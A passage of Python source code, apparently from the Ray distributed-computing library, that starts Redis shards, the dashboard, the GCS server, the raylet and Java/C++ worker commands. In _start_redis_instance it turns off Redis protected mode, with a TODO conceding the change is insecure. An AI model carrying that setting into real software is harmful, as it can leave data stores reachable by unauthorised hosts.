os.environ.get(gdb_env_var) == "1": logger.info("Detected environment variable '%s'.", gdb_env_var) use_gdb = True if sum([ use_gdb, use_valgrind, use_valgrind_profiler, use_perftools_profiler, ]) > 1: raise ValueError( "At most one of the 'use_gdb', 'use_valgrind', " "'use_valgrind_profiler', and 'use_perftools_profiler' flags can " "be used at a time.") if env_updates is None: env_updates = {} if not isinstance(env_updates, dict): raise ValueError("The 'env_updates' argument must be a dictionary.") modified_env = os.environ.copy() modified_env.update(env_updates) if use_gdb: if not use_tmux: raise ValueError( "If 'use_gdb' is true, then 'use_tmux' must be true as well.") # TODO(suquark): Any better temp file creation here? 
gdb_init_path = os.path.join(ray._private.utils.get_ray_temp_dir(), f"gdb_init_{process_type}_{time.time()}") ray_process_path = command[0] ray_process_args = command[1:] run_args = " ".join(["'{}'".format(arg) for arg in ray_process_args]) with open(gdb_init_path, "w") as gdb_init_file: gdb_init_file.write(f"run {run_args}") command = ["gdb", ray_process_path, "-x", gdb_init_path] if use_valgrind: command = [ "valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--leak-check-heuristics=stdstring", "--error-exitcode=1", ] + command if use_valgrind_profiler: command = ["valgrind", "--tool=callgrind"] + command if use_perftools_profiler: modified_env["LD_PRELOAD"] = os.environ["PERFTOOLS_PATH"] modified_env["CPUPROFILE"] = os.environ["PERFTOOLS_LOGFILE"] if use_tmux: # The command has to be created exactly as below to ensure that it # works on all versions of tmux. (Tested with tmux 1.8-5, travis' # version, and tmux 2.1) command = ["tmux", "new-session", "-d", f"{' '.join(command)}"] if fate_share: assert ray._private.utils.detect_fate_sharing_support(), ( "kernel-level fate-sharing must only be specified if " "detect_fate_sharing_support() has returned True") def preexec_fn(): import signal signal.pthread_sigmask(signal.SIG_BLOCK, {signal.SIGINT}) if fate_share and sys.platform.startswith("linux"): ray._private.utils.set_kill_on_parent_death_linux() win32_fate_sharing = fate_share and sys.platform == "win32" # With Windows fate-sharing, we need special care: # The process must be added to the job before it is allowed to execute. # Otherwise, there's a race condition: the process might spawn children # before the process itself is assigned to the job. # After that point, its children will not be added to the job anymore. CREATE_SUSPENDED = 0x00000004 # from Windows headers process = ConsolePopen( command, env=modified_env, cwd=cwd, stdout=stdout_file, stderr=stderr_file, stdin=subprocess.PIPE if pipe_stdin else None, preexec_fn=preexec_fn if sys.platform != "win32" else None, creationflags=CREATE_SUSPENDED if win32_fate_sharing else 0) if win32_fate_sharing: try: ray._private.utils.set_kill_child_on_death_win32(process) psutil.Process(process.pid).resume() except (psutil.Error, OSError): process.kill() raise def _get_stream_name(stream): if stream is not None: try: return stream.name except AttributeError: return str(stream) return None return ProcessInfo( process=process, stdout_file=_get_stream_name(stdout_file), stderr_file=_get_stream_name(stderr_file), use_valgrind=use_valgrind, use_gdb=use_gdb, use_valgrind_profiler=use_valgrind_profiler, use_perftools_profiler=use_perftools_profiler, use_tmux=use_tmux) def wait_for_redis_to_start(redis_ip_address, redis_port, password=None): """Wait for a Redis server to be available. This is accomplished by creating a Redis client and sending a random command to the server until the command gets through. Args: redis_ip_address (str): The IP address of the redis server. redis_port (int): The port of the redis server. password (str): The password of the redis server. Raises: Exception: An exception is raised if we could not connect with Redis. """ redis_client = redis.StrictRedis( host=redis_ip_address, port=redis_port, password=password) # Wait for the Redis server to start. num_retries = ray_constants.START_REDIS_WAIT_RETRIES delay = 0.001 for i in range(num_retries): try: # Run some random command and see if it worked. 
logger.debug( "Waiting for redis server at {}:{} to respond...".format( redis_ip_address, redis_port)) redis_client.client_list() # If the Redis service is delayed getting set up for any reason, we may # get a redis.ConnectionError: Error 111 connecting to host:port. # Connection refused. # Unfortunately, redis.ConnectionError is also the base class of # redis.AuthenticationError. We *don't* want to obscure a # redis.AuthenticationError, because that indicates the user provided a # bad password. Thus a double except clause to ensure a # redis.AuthenticationError isn't trapped here. except redis.AuthenticationError as authEx: raise RuntimeError("Unable to connect to Redis at {}:{}.".format( redis_ip_address, redis_port)) from authEx except redis.ConnectionError as connEx: if i >= num_retries - 1: raise RuntimeError( f"Unable to connect to Redis at {redis_ip_address}:" f"{redis_port} after {num_retries} retries. Check that " f"{redis_ip_address}:{redis_port} is reachable from this " "machine. If it is not, your firewall may be blocking " "this port. If the problem is a flaky connection, try " "setting the environment variable " "`RAY_START_REDIS_WAIT_RETRIES` to increase the number of" " attempts to ping the Redis server.") from connEx # Wait a little bit. time.sleep(delay) delay *= 2 else: break else: raise RuntimeError( f"Unable to connect to Redis (after {num_retries} retries). " "If the Redis instance is on a different machine, check that " "your firewall and relevant Ray ports are configured properly. " "You can also set the environment variable " "`RAY_START_REDIS_WAIT_RETRIES` to increase the number of " "attempts to ping the Redis server.") def _compute_version_info(): """Compute the versions of Python, and Ray. Returns: A tuple containing the version information. """ ray_version = ray.__version__ python_version = ".".join(map(str, sys.version_info[:3])) return ray_version, python_version def _put_version_info_in_redis(redis_client): """Store version information in Redis. This will be used to detect if workers or drivers are started using different versions of Python, or Ray. Args: redis_client: A client for the primary Redis shard. """ redis_client.set("VERSION_INFO", json.dumps(_compute_version_info())) def check_version_info(redis_client): """Check if various version info of this process is correct. This will be used to detect if workers or drivers are started using different versions of Python, or Ray. If the version information is not present in Redis, then no check is done. Args: redis_client: A client for the primary Redis shard. Raises: Exception: An exception is raised if there is a version mismatch. """ redis_reply = redis_client.get("VERSION_INFO") # Don't do the check if there is no version information in Redis. This # is to make it easier to do things like start the processes by hand. 
if redis_reply is None: return true_version_info = tuple( json.loads(ray._private.utils.decode(redis_reply))) version_info = _compute_version_info() if version_info != true_version_info: node_ip_address = get_node_ip_address() error_message = ("Version mismatch: The cluster was started with:\n" " Ray: " + true_version_info[0] + "\n" " Python: " + true_version_info[1] + "\n" "This process on node " + node_ip_address + " was started with:" + "\n" " Ray: " + version_info[0] + "\n" " Python: " + version_info[1] + "\n") if version_info[:2] != true_version_info[:2]: raise RuntimeError(error_message) else: logger.warning(error_message) def start_reaper(fate_share=None): """Start the reaper process. This is a lightweight process that simply waits for its parent process to die and then terminates its own process group. This allows us to ensure that ray processes are always terminated properly so long as that process itself isn't SIGKILLed. Returns: ProcessInfo for the process that was started. """ # Make ourselves a process group leader so that the reaper can clean # up other ray processes without killing the process group of the # process that started us. try: if sys.platform != "win32": os.setpgrp() except OSError as e: errcode = e.errno if errcode == errno.EPERM and os.getpgrp() == os.getpid(): # Nothing to do; we're already a session leader. pass else: logger.warning("setpgrp failed, processes may not be " "cleaned up properly: {}.".format(e)) # Don't start the reaper in this case as it could result in killing # other user processes. return None reaper_filepath = os.path.join(RAY_PATH, RAY_PRIVATE_DIR, "ray_process_reaper.py") command = [sys.executable, "-u", reaper_filepath] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_REAPER, pipe_stdin=True, fate_share=fate_share) return process_info def start_redis(node_ip_address, redirect_files, resource_spec, port=None, redis_shard_ports=None, num_redis_shards=1, redis_max_clients=None, redirect_worker_output=False, password=None, fate_share=None, external_addresses=None, port_denylist=None): """Start the Redis global state store. Args: node_ip_address: The IP address of the current node. This is only used for recording the log filenames in Redis. redirect_files: The list of (stdout, stderr) file pairs. resource_spec (ResourceSpec): Resources for the node. port (int): If provided, the primary Redis shard will be started on this port. redis_shard_ports: A list of the ports to use for the non-primary Redis shards. num_redis_shards (int): If provided, the number of Redis shards to start, in addition to the primary one. The default value is one shard. redis_max_clients: If this is provided, Ray will attempt to configure Redis with this maxclients number. redirect_worker_output (bool): True if worker output should be redirected to a file and false otherwise. Workers will have access to this value when they start up. password (str): Prevents external clients without the password from connecting to Redis if provided. port_denylist (set): A set of denylist ports that shouldn't be used when allocating a new port. Returns: A tuple of the address for the primary Redis shard, a list of addresses for the remaining shards, and the processes that were started. 
""" if len(redirect_files) != 1 + num_redis_shards: raise ValueError("The number of redirect file pairs should be equal " "to the number of redis shards (including the " "primary shard) we will start.") if redis_shard_ports is None: redis_shard_ports = num_redis_shards * [None] elif len(redis_shard_ports) != num_redis_shards: raise RuntimeError("The number of Redis shard ports does not match " "the number of Redis shards.") processes = [] if external_addresses is not None: primary_redis_address = external_addresses[0] [primary_redis_ip, port] = primary_redis_address.split(":") port = int(port) redis_address = address(primary_redis_ip, port) primary_redis_client = create_redis_client( "%s:%s" % (primary_redis_ip, port), password=password) # Deleting the key to avoid duplicated rpush. primary_redis_client.delete("RedisShards") else: redis_executable = REDIS_EXECUTABLE redis_modules = [REDIS_MODULE] redis_stdout_file, redis_stderr_file = redirect_files[0] # If no port is given, fallback to default Redis port for the primary # shard. if port is None: port = ray_constants.DEFAULT_PORT num_retries = 20 else: num_retries = 1 # Start the primary Redis shard. port, p = _start_redis_instance( redis_executable, modules=redis_modules, port=port, password=password, redis_max_clients=redis_max_clients, num_retries=num_retries, # Below we use None to indicate no limit on the memory of the # primary Redis shard. redis_max_memory=None, stdout_file=redis_stdout_file, stderr_file=redis_stderr_file, fate_share=fate_share, port_denylist=port_denylist) processes.append(p) redis_address = address(node_ip_address, port) primary_redis_client = redis.StrictRedis( host=node_ip_address, port=port, password=password) # Register the number of Redis shards in the primary shard, so that clients # know how many redis shards to expect under RedisShards. primary_redis_client.set("NumRedisShards", str(num_redis_shards)) # Put the redirect_worker_output bool in the Redis shard so that workers # can access it and know whether or not to redirect their output. primary_redis_client.set("RedirectOutput", 1 if redirect_worker_output else 0) # Init job counter to GCS. primary_redis_client.set("JobCounter", 0) # Store version information in the primary Redis shard. _put_version_info_in_redis(primary_redis_client) # Calculate the redis memory. assert resource_spec.resolved() redis_max_memory = resource_spec.redis_max_memory # Start other Redis shards. Each Redis shard logs to a separate file, # prefixed by "redis-<shard number>". redis_shards = [] # If Redis shard ports are not provided, start the port range of the # other Redis shards at a high, random port. last_shard_port = new_port(denylist=port_denylist) - 1 for i in range(num_redis_shards): if external_addresses is not None and len(external_addresses) > 1: shard_address = external_addresses[i + 1] else: redis_stdout_file, redis_stderr_file = redirect_files[i + 1] redis_executable = REDIS_EXECUTABLE redis_modules = [REDIS_MODULE] redis_shard_port = redis_shard_ports[i] # If no shard port is given, try to start this shard's Redis # instance on the port right after the last shard's port. 
if redis_shard_port is None: redis_shard_port = last_shard_port + 1 num_retries = 20 else: num_retries = 1 redis_shard_port, p = _start_redis_instance( redis_executable, modules=redis_modules, port=redis_shard_port, password=password, redis_max_clients=redis_max_clients, num_retries=num_retries, redis_max_memory=redis_max_memory, stdout_file=redis_stdout_file, stderr_file=redis_stderr_file, fate_share=fate_share, port_denylist=port_denylist) processes.append(p) shard_address = address(node_ip_address, redis_shard_port) last_shard_port = redis_shard_port redis_shards.append(shard_address) # Store redis shard information in the primary redis shard. primary_redis_client.rpush("RedisShards", shard_address) return redis_address, redis_shards, processes def _start_redis_instance(executable, modules, port, redis_max_clients=None, num_retries=20, stdout_file=None, stderr_file=None, password=None, redis_max_memory=None, fate_share=None, port_denylist=None): """Start a single Redis server. Notes: We will initially try to start the Redis instance at the given port, and then try at most `num_retries - 1` times to start the Redis instance at successive random ports. Args: executable (str): Full path of the redis-server executable. modules (list of str): A list of pathnames, pointing to the redis module(s) that will be loaded in this redis server. port (int): Try to start a Redis server at this port. redis_max_clients: If this is provided, Ray will attempt to configure Redis with this maxclients number. num_retries (int): The number of times to attempt to start Redis at successive ports. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. password (str): Prevents external clients without the password from connecting to Redis if provided. redis_max_memory: The max amount of memory (in bytes) to allow redis to use, or None for no limit. Once the limit is exceeded, redis will start LRU eviction of entries. port_denylist (set): A set of denylist ports that shouldn't be used when allocating a new port. Returns: A tuple of the port used by Redis and ProcessInfo for the process that was started. If a port is passed in, then the returned port value is the same. Raises: Exception: An exception is raised if Redis could not be started. """ assert os.path.isfile(executable) for module in modules: assert os.path.isfile(module) counter = 0 load_module_args = [] for module in modules: load_module_args += ["--loadmodule", module] while counter < num_retries: # Construct the command to start the Redis server. command = [executable] if password: if " " in password: raise ValueError("Spaces not permitted in redis password.") command += ["--requirepass", password] command += ( ["--port", str(port), "--loglevel", "warning"] + load_module_args) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_REDIS_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) time.sleep(0.1) # Check if Redis successfully started (or at least if it the executable # did not exit within 0.1 seconds). if process_info.process.poll() is None: break port = new_port(denylist=port_denylist) counter += 1 if counter == num_retries: raise RuntimeError("Couldn't start Redis. 
" "Check log files: {} {}".format( stdout_file.name if stdout_file is not None else "<stdout>", stderr_file.name if stdout_file is not None else "<stderr>")) # Create a Redis client just for configuring Redis. redis_client = redis.StrictRedis( host="127.0.0.1", port=port, password=password) # Wait for the Redis server to start. wait_for_redis_to_start("127.0.0.1", port, password=password) # Configure Redis to generate keyspace notifications. TODO(rkn): Change # this to only generate notifications for the export keys. redis_client.config_set("notify-keyspace-events", "Kl") # Configure Redis to not run in protected mode so that processes on other # hosts can connect to it. TODO(rkn): Do this in a more secure way. redis_client.config_set("protected-mode", "no") # Discard old task and object metadata. if redis_max_memory is not None: redis_client.config_set("maxmemory", str(redis_max_memory)) redis_client.config_set("maxmemory-policy", "allkeys-lru") redis_client.config_set("maxmemory-samples", "10") logger.debug("Starting Redis shard with {} GB max memory.".format( round(redis_max_memory / 1e9, 2))) # If redis_max_clients is provided, attempt to raise the number of maximum # number of Redis clients. if redis_max_clients is not None: redis_client.config_set("maxclients", str(redis_max_clients)) elif resource is not None: # If redis_max_clients is not provided, determine the current ulimit. # We will use this to attempt to raise the maximum number of Redis # clients. current_max_clients = int( redis_client.config_get("maxclients")["maxclients"]) # The below command should be the same as doing ulimit -n. ulimit_n = resource.getrlimit(resource.RLIMIT_NOFILE)[0] # The quantity redis_client_buffer appears to be the required buffer # between the maximum number of redis clients and ulimit -n. That is, # if ulimit -n returns 10000, then we can set maxclients to # 10000 - redis_client_buffer. redis_client_buffer = 32 if current_max_clients < ulimit_n - redis_client_buffer: redis_client.config_set("maxclients", ulimit_n - redis_client_buffer) # Increase the hard and soft limits for the redis client pubsub buffer to # 128MB. This is a hack to make it less likely for pubsub messages to be # dropped and for pubsub connections to therefore be killed. cur_config = (redis_client.config_get("client-output-buffer-limit")[ "client-output-buffer-limit"]) cur_config_list = cur_config.split() assert len(cur_config_list) == 12 cur_config_list[8:] = ["pubsub", "134217728", "134217728", "60"] redis_client.config_set("client-output-buffer-limit", " ".join(cur_config_list)) # Put a time stamp in Redis to indicate when it was started. redis_client.set("redis_start_time", time.time()) return port, process_info def start_log_monitor(redis_address, logs_dir, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0): """Start a log monitor process. Args: redis_address (str): The address of the Redis instance. logs_dir (str): The directory of logging files. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. 
Returns: ProcessInfo for the process that was started. """ log_monitor_filepath = os.path.join(RAY_PATH, RAY_PRIVATE_DIR, "log_monitor.py") command = [ sys.executable, "-u", log_monitor_filepath, f"--redis-address={redis_address}", f"--logs-dir={logs_dir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if redis_password: command += ["--redis-password", redis_password] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_LOG_MONITOR, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_dashboard(require_dashboard, host, redis_address, temp_dir, logdir, port=None, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0): """Start a dashboard process. Args: require_dashboard (bool): If true, this will raise an exception if we fail to start the dashboard. Otherwise it will print a warning if we fail to start the dashboard. host (str): The host to bind the dashboard web server to. port (str): The port to bind the dashboard web server to. Defaults to 8265. redis_address (str): The address of the Redis instance. temp_dir (str): The temporary directory used for log files and information for this Ray session. logdir (str): The log directory used to generate dashboard log. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ try: # Make sure port is available. if port is None: port_retries = 50 port = ray_constants.DEFAULT_DASHBOARD_PORT else: port_retries = 0 port_test_socket = socket.socket() port_test_socket.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1, ) try: port_test_socket.bind((host, port)) port_test_socket.close() except socket.error as e: if e.errno in {48, 98}: # address already in use. raise ValueError( f"Failed to bind to {host}:{port} because it's " "already occupied. You can use `ray start " "--dashboard-port ...` or `ray.init(dashboard_port=..." ")` to select a different port.") else: raise e # Make sure the process can start. try: import aiohttp # noqa: F401 import aioredis # noqa: F401 import aiohttp_cors # noqa: F401 import grpc # noqa: F401 except ImportError: warning_message = ( "Not all Ray Dashboard dependencies were found. " "In Ray 1.4+, the Ray CLI, autoscaler, and dashboard will " "only be usable via `pip install 'ray[default]'`. Please " "update your install command.") raise ImportError(warning_message) # Start the dashboard process. 
dashboard_dir = "new_dashboard" dashboard_filepath = os.path.join(RAY_PATH, dashboard_dir, "dashboard.py") command = [ sys.executable, "-u", dashboard_filepath, f"--host={host}", f"--port={port}", f"--port-retries={port_retries}", f"--redis-address={redis_address}", f"--temp-dir={temp_dir}", f"--log-dir={logdir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if redis_password: command += ["--redis-password", redis_password] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_DASHBOARD, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) # Retrieve the dashboard url redis_client = ray._private.services.create_redis_client( redis_address, redis_password) dashboard_url = None dashboard_returncode = None for _ in range(200): dashboard_url = redis_client.get(ray_constants.REDIS_KEY_DASHBOARD) if dashboard_url is not None: dashboard_url = dashboard_url.decode("utf-8") break dashboard_returncode = process_info.process.poll() if dashboard_returncode is not None: break # This is often on the critical path of ray.init() and ray start, # so we need to poll often. time.sleep(0.1) if dashboard_url is None: dashboard_log = os.path.join(logdir, "dashboard.log") returncode_str = (f", return code {dashboard_returncode}" if dashboard_returncode is not None else "") # Read last n lines of dashboard log. The log file may be large. n = 10 lines = [] try: with open(dashboard_log, "rb") as f: with mmap.mmap( f.fileno(), 0, access=mmap.ACCESS_READ) as mm: end = mm.size() for _ in range(n): sep = mm.rfind(b"\n", 0, end - 1) if sep == -1: break lines.append(mm[sep + 1:end].decode("utf-8")) end = sep lines.append(f" The last {n} lines of {dashboard_log}:") except Exception as e: raise Exception(f"Failed to read dashbord log: {e}") last_log_str = "\n".join(reversed(lines[-n:])) raise Exception("Failed to start the dashboard" f"{returncode_str}.{last_log_str}") logger.info("View the Ray dashboard at %s%shttp://%s%s%s", colorama.Style.BRIGHT, colorama.Fore.GREEN, dashboard_url, colorama.Fore.RESET, colorama.Style.NORMAL) return dashboard_url, process_info except Exception as e: if require_dashboard: raise e from e else: logger.error(f"Failed to start the dashboard: {e}") return None, None def start_gcs_server(redis_address, stdout_file=None, stderr_file=None, redis_password=None, config=None, fate_share=None, gcs_server_port=None, metrics_agent_port=None, node_ip_address=None): """Start a gcs server. Args: redis_address (str): The address that the Redis server is listening on. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. config (dict|None): Optional configuration that will override defaults in RayConfig. gcs_server_port (int): Port number of the gcs server. metrics_agent_port(int): The port where metrics agent is bound to. node_ip_address(str): IP Address of a node where gcs server starts. Returns: ProcessInfo for the process that was started. 
""" gcs_ip_address, gcs_port = redis_address.split(":") redis_password = redis_password or "" config_str = serialize_config(config) if gcs_server_port is None: gcs_server_port = 0 command = [ GCS_SERVER_EXECUTABLE, f"--redis_address={gcs_ip_address}", f"--redis_port={gcs_port}", f"--config_list={config_str}", f"--gcs_server_port={gcs_server_port}", f"--metrics-agent-port={metrics_agent_port}", f"--node-ip-address={node_ip_address}", ] if redis_password: command += [f"--redis_password={redis_password}"] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_GCS_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_raylet(redis_address, node_ip_address, node_manager_port, raylet_name, plasma_store_name, worker_path, setup_worker_path, worker_setup_hook, runtime_env_setup_hook, temp_dir, session_dir, resource_dir, log_dir, resource_spec, plasma_directory, object_store_memory, min_worker_port=None, max_worker_port=None, worker_port_list=None, object_manager_port=None, redis_password=None, metrics_agent_port=None, metrics_export_port=None, use_valgrind=False, use_profiler=False, stdout_file=None, stderr_file=None, config=None, huge_pages=False, fate_share=None, socket_to_use=None, start_initial_python_workers_for_first_job=False, max_bytes=0, backup_count=0): """Start a raylet, which is a combined local scheduler and object manager. Args: redis_address (str): The address of the primary Redis server. node_ip_address (str): The IP address of this node. node_manager_port(int): The port to use for the node manager. If it's 0, a random port will be used. raylet_name (str): The name of the raylet socket to create. plasma_store_name (str): The name of the plasma store socket to connect to. worker_path (str): The path of the Python file that new worker processes will execute. setup_worker_path (str): The path of the Python file that will run worker_setup_hook to set up the environment for the worker process. worker_setup_hook (str): The module path to a Python function that will be imported and run to set up the environment for the worker. runtime_env_setup_hook (str): The module path to a Python function that will be imported and run to set up the runtime env in agent. temp_dir (str): The path of the temporary directory Ray will use. session_dir (str): The path of this session. resource_dir(str): The path of resource of this session . log_dir (str): The path of the dir where log files are created. resource_spec (ResourceSpec): Resources for this raylet. object_manager_port: The port to use for the object manager. If this is None, then the object manager will choose its own port. min_worker_port (int): The lowest port number that workers will bind on. If not set, random ports will be chosen. max_worker_port (int): The highest port number that workers will bind on. If set, min_worker_port must also be set. redis_password: The password to use when connecting to Redis. metrics_agent_port(int): The port where metrics agent is bound to. metrics_export_port(int): The port at which metrics are exposed to. use_valgrind (bool): True if the raylet should be started inside of valgrind. If this is True, use_profiler must be False. use_profiler (bool): True if the raylet should be started inside a profiler. If this is True, use_valgrind must be False. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. 
If no redirection should happen, then this should be None. tracing_startup_hook: Tracing startup hook. config (dict|None): Optional Raylet configuration that will override defaults in RayConfig. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ assert node_manager_port is not None and type(node_manager_port) == int if use_valgrind and use_profiler: raise ValueError("Cannot use valgrind and profiler at the same time.") assert resource_spec.resolved() static_resources = resource_spec.to_resource_dict() # Limit the number of workers that can be started in parallel by the # raylet. However, make sure it is at least 1. num_cpus_static = static_resources.get("CPU", 0) maximum_startup_concurrency = max( 1, min(multiprocessing.cpu_count(), num_cpus_static)) # Format the resource argument in a form like 'CPU,1.0,GPU,0,Custom,3'. resource_argument = ",".join( ["{},{}".format(*kv) for kv in static_resources.items()]) gcs_ip_address, gcs_port = redis_address.split(":") has_java_command = False if shutil.which("java") is not None: has_java_command = True ray_java_installed = False try: jars_dir = get_ray_jars_dir() if os.path.exists(jars_dir): ray_java_installed = True except Exception: pass include_java = has_java_command and ray_java_installed if include_java is True: java_worker_command = build_java_worker_command( redis_address, plasma_store_name, raylet_name, redis_password, session_dir, node_ip_address, ) else: java_worker_command = [] if os.path.exists(DEFAULT_WORKER_EXECUTABLE): cpp_worker_command = build_cpp_worker_command( "", redis_address, plasma_store_name, raylet_name, redis_password, session_dir, log_dir, node_ip_address) else: cpp_worker_command = [] # Create the command that the Raylet will use to start workers. # TODO(architkulkarni): Pipe in setup worker args separately instead of # inserting them into start_worker_command and later erasing them if # needed. start_worker_command = [ sys.executable, setup_worker_path, f"--worker-setup-hook={worker_setup_hook}", f"--session-dir={session_dir}", worker_path, f"--node-ip-address={node_ip_address}", "--node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--object-store-name={plasma_store_name}", f"--raylet-name={raylet_name}", f"--redis-address={redis_address}", f"--temp-dir={temp_dir}", f"--metrics-agent-port={metrics_agent_port}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}", "RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER", ] if redis_password: start_worker_command += [f"--redis-password={redis_password}"] # If the object manager port is None, then use 0 to cause the object # manager to choose its own port. 
if object_manager_port is None: object_manager_port = 0 if min_worker_port is None: min_worker_port = 0 if max_worker_port is None: max_worker_port = 0 # Create agent command agent_command = [ sys.executable, "-u", os.path.join(RAY_PATH, "new_dashboard/agent.py"), f"--node-ip-address={node_ip_address}", f"--redis-address={redis_address}", f"--metrics-export-port={metrics_export_port}", f"--dashboard-agent-port={metrics_agent_port}", "--node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--object-store-name={plasma_store_name}", f"--raylet-name={raylet_name}", f"--temp-dir={temp_dir}", f"--session-dir={session_dir}", f"--runtime-env-dir={resource_dir}", f"--runtime-env-setup-hook={runtime_env_setup_hook}", f"--log-dir={log_dir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}", ] if redis_password is not None and len(redis_password) != 0: agent_command.append("--redis-password={}".format(redis_password)) command = [ RAYLET_EXECUTABLE, f"--raylet_socket_name={raylet_name}", f"--store_socket_name={plasma_store_name}", f"--object_manager_port={object_manager_port}", f"--min_worker_port={min_worker_port}", f"--max_worker_port={max_worker_port}", f"--node_manager_port={node_manager_port}", f"--node_ip_address={node_ip_address}", f"--redis_address={gcs_ip_address}", f"--redis_port={gcs_port}", f"--maximum_startup_concurrency={maximum_startup_concurrency}", f"--static_resource_list={resource_argument}", f"--python_worker_command={subprocess.list2cmdline(start_worker_command)}", # noqa f"--java_worker_command={subprocess.list2cmdline(java_worker_command)}", # noqa f"--cpp_worker_command={subprocess.list2cmdline(cpp_worker_command)}", # noqa f"--redis_password={redis_password or ''}", f"--temp_dir={temp_dir}", f"--session_dir={session_dir}", f"--resource_dir={resource_dir}", f"--metrics-agent-port={metrics_agent_port}", f"--metrics_export_port={metrics_export_port}", f"--object_store_memory={object_store_memory}", f"--plasma_directory={plasma_directory}", ] if worker_port_list is not None: command.append(f"--worker_port_list={worker_port_list}") if start_initial_python_workers_for_first_job: command.append("--num_initial_python_workers_for_first_job={}".format( resource_spec.num_cpus)) command.append("--agent_command={}".format( subprocess.list2cmdline(agent_command))) if huge_pages: command.append("--huge_pages") if socket_to_use: socket_to_use.close() process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_RAYLET, use_valgrind=use_valgrind, use_gdb=False, use_valgrind_profiler=use_profiler, use_perftools_profiler=("RAYLET_PERFTOOLS_PATH" in os.environ), stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def get_ray_jars_dir(): """Return a directory where all ray-related jars and their dependencies locate.""" current_dir = RAY_PATH jars_dir = os.path.abspath(os.path.join(current_dir, "jars")) if not os.path.exists(jars_dir): raise RuntimeError("Ray jars is not packaged into ray. " "Please build ray with java enabled " "(set env var RAY_INSTALL_JAVA=1)") return os.path.abspath(os.path.join(current_dir, "jars")) def build_java_worker_command( redis_address, plasma_store_name, raylet_name, redis_password, session_dir, node_ip_address, ): """This method assembles the command used to start a Java worker. Args: redis_address (str): Redis address of GCS. plasma_store_name (str): The name of the plasma store socket to connect to. raylet_name (str): The name of the raylet socket to create. 
redis_password (str): The password of connect to redis. session_dir (str): The path of this session. node_ip_address (str): The ip address for this node. Returns: The command string for starting Java worker. """ pairs = [] if redis_address is not None: pairs.append(("ray.address", redis_address)) pairs.append(("ray.raylet.node-manager-port", "RAY_NODE_MANAGER_PORT_PLACEHOLDER")) if plasma_store_name is not None: pairs.append(("ray.object-store.socket-name", plasma_store_name)) if raylet_name is not None: pairs.append(("ray.raylet.socket-name", raylet_name)) if redis_password is not None: pairs.append(("ray.redis.password", redis_password)) if node_ip_address is not None: pairs.append(("ray.node-ip", node_ip_address)) pairs.append(("ray.home", RAY_HOME)) pairs.append(("ray.logging.dir", os.path.join(session_dir, "logs"))) pairs.append(("ray.session-dir", session_dir)) command = ["java"] + ["-D{}={}".format(*pair) for pair in pairs] # Add ray jars path to java classpath ray_jars = os.path.join(get_ray_jars_dir(), "*") command += ["-cp", ray_jars] command += ["RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER"] command += ["io.ray.runtime.runner.worker.DefaultWorker"] return command def build_cpp_worker_command(cpp_worker_options, redis_address, plasma_store_name, raylet_name, redis_password, session_dir, log_dir, node_ip_address): """This method assembles the command used to start a CPP worker. Args: cpp_worker_options (list): The command options for CPP worker. redis_address (str): Redis address of GCS. plasma_store_name (str): The name of the plasma store socket to connect to. raylet_name (str): The name of the raylet socket to create. redis_password (str): The password of connect to redis. session_dir (str): The path of this session. log_dir (str): The path of logs. node_ip_address (str): The ip address for this node. Returns: The command string for starting CPP worker. """ command = [ DEFAULT_WORKER_EXECUTABLE, f"--ray-plasma-store-socket-name={plasma_store_name}", f"--ray-raylet-socket-name={raylet_name}", "--ray-node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--ray-address={redis_address}", f"--ray-redis-password={redis_password}", f"--ray-session-dir={session_dir}", f"--ray-logs-dir={log_dir}", f"--ray-node-ip-address={node_ip_address}", 